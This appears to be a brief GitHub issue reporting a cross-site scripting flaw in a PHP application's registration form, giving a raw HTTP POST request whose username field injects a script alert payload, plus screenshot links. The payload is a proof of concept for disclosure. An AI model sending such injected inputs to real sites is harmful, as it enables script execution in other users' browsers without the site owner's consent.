there is a xss

POST /w/index.php?m=public&a=doregister HTTP/1.1
Host: 192.168.66.128
Content-Length: 204
Cache-Control: max-age=0
Origin: http://192.168.66.128
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.66.128/w/index.php?m=public&a=register
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt5sd3ceatlifr5hrv4vtpn3h6
Connection: close

username=%3Cscript%3Ealert(document.domain)</script>&useremail=1140820932%40qq.com&userpass=123456&reuserpass=123456&verify=03247&__hash__=8fea33ca2fc275601dfd7539f1c4f559_0c683e5c5a4f93a943a4e955ea83e75f


<img width="1004" alt="2018-10-23 9 23 34" src="https://user-images.githubusercontent.com/16758690/47363686-f3d06b00-d709-11e8-96b6-17058ccbf0dd.png">


<img width="1211" alt="2018-10-23 9 24 34" src="https://user-images.githubusercontent.com/16758690/47364072-ef588200-d70a-11e8-9541-7a7426cf3074.png">



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

there is a xss #8

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

there is a xss #8

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions